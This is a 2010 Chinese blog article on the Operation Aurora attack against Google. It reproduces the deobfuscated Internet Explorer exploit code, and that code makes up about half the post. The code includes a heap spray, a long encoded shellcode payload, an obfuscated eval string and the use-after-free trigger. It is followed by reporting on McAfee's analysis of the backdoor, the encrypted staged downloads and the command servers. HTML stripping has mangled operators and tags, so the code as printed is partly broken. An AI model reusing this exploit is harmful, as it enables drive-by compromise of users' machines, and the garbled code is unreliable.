极光行动:攻击Google的代码曝光

作者在 2010-01-18 22:17:41 发布以下内容
TechWeb旗下的DarkReading发表文章,透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google被攻击的声明,承认McAfee所说的IE漏洞才是祸源。

文章还给出了一个链接,指向开源渗透测试工具项目Metasploit的博客,上面给出了利用这个IE漏洞的攻击代码链接。代码如下:

【去混淆后的代码】

Evals

*

var n = unescape("%u0c0d%u0c0d");
while (n.length = 524288)n += n;
n = n.substring(0, 524269 - sc.length);
var x = new Array();
for (var i = 0; i 
200; i ++ ){
x[i] = n + sc;
}

(repeated 1 time)

Writes

*

htmlscriptvar sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i  sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
);
cc = cc.replace(/@/g, ",");
eval_r(cc);
var x1 = new Array();
for (i = 0; i  200; i ++ ){
x1[i] = document.createElement_x("COMMENT");
x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i  x1.length; i ++ ){
x1[i].data = p;
}
;
var t = e1.srcElement;
}
/scriptspan id="sp1"IMG SRC="aaa.gif" onload="ev1(event)"/span/body/html

(repeated 1 time)

微软也发布了对这个漏洞的更新分析,表明Windows XP上的IE 6最为危险。值得一提的是,文章特别感谢了CSDN专家博客暨《程序员》杂志专栏作者、微软中国的褚诚云。我们会尽快邀请褚诚云写出更深入的分析文章。

还有专家用视频演示了攻击过程。

此前,《连线》杂志文章给出了大量攻击细节。

文章引述McAfee公司的话,说(攻击Google的)黑客使用了前所未有的战术,组合了加密、隐秘编程技术和IE中的未知漏洞,意图是窃取Google、Adobe和许多其他大公司的源代码。

该公司威胁研究副总裁Dmitri Alperovitch说:在国防工业之外,我们从未见过商业行业的公司遭受过如此复杂程度的攻击。

Alperovitch说,攻击者使用了十几种恶意代码和多层次的加密,深深地挖掘进了公司网络内部,并巧妙掩盖自己的活动。在掩饰攻击和防范常规侦测方法上,他们的加密非常成功。我们从未见过这种水平的加密。非常高超。

McAfee之所以将这种攻击命名为Auroro(极光),是因为他们发现,黑客在将恶意代码编译为可执行文件时,编译器将攻击者机器上的路径名插入代码中。

在IE漏洞被曝光后,微软很快发布了针对性的安全建议书。而McAfee也在其产品中增加了侦测这种攻击所用恶意代码的功能。

虽然最初的攻击始自公司雇员访问恶意网站,但是研究人员还在试图确定网站的URL是通过邮件、聊天程序还是其他方式,比如Facebook或者其他社会化网站。

当用户访问恶意网站的时候,他们的IE浏览器将被袭击,自动而且秘密地下载一系列恶意代码到计算机中。这些代码就像俄罗斯套娃那样,一个跟着一个地下载到系统中。

Alperovitch表示,最初的攻击代码是经过三次加密的shell code,用来激活漏洞挖掘程序。然后它执行从外部机器下载的程序,后者也是加密的,而且会从被攻击机器上删除第一个程序。这些加密的二进制文件将自己打包为几个也被加密的可执行文件。

其中一个恶意程序会打开一个远程后门,建立一个加密的秘密通道,伪装为一个SSL链接以避免被侦测到。这样攻击者就可以对被攻击机器进行访问,将它作为滩头阵地,继续进攻网络上的其他部分,搜索登录凭据、知识产权和其他要找的东西。

McAfee因参与攻击调查,从被攻击公司那里得到了攻击所用的一些恶意代码副本,并在几天前加强了自己的产品。

对于另一家安全企业iDefense之前所说的有些攻击使用了Trojan.Hydraq木马,Alperovitch表示,他发现的恶意代码此前任何反病毒厂商都不知道。

iDefense还说攻击者使用了恶意PDF附件和Adobe PDF程序的漏洞,而Alperovitch说,他调查的公司里没有发现这种情况。但他表示攻击不同公司的方法可能不同,不限于IE漏洞。

当黑客进入系统后,他们将数据发送给位于美国伊利诺依州和得克萨斯州以及中国台湾的指挥控制服务器。Alperovitch所没有识别到美国的系统牵涉到这次攻击,也没有提到攻击者的战果。但Rackspace报告他们无意中在攻击中发挥了少量作用。而iDefense则表示攻击者的目标是许多公司的源码库,而且很多情况下都成功得手。

Alperovitch说攻击看上去是从12月15日开始的,但也有可能更早。似乎结束于1月4日,那一天,用来与恶意代码传输数据的指挥控制服务器被关闭。

他说:我们不知道服务器是由攻击者关闭的,还是其他组织关闭的。但是从那时起,攻击停止了。

Aperovitch还指出,攻击的时机非常好,是在假日期间,公司的运营中心和安全响应团队人手很少。攻击的复杂程度令人印象深刻,是那种此前仅针对国防工业的攻击类型。一般对于商业部门,攻击只是为了获取财务方面的信息,通常是通过SQL注入攻击公司的网站,或者攻击公司不安全的无线网络。网络罪犯一般不会花大量的时间把攻击精雕细刻到如此程度,每个方面都采取混淆/加密防范。

McAfee还掌握了更多攻击细节,但目前不准备公布。他们已经与美国执法部门合作,并将这一问题告知美国各级政府。

           
推荐文章 | 阅读 1282 次
文章评论,共0条
游客请输入验证码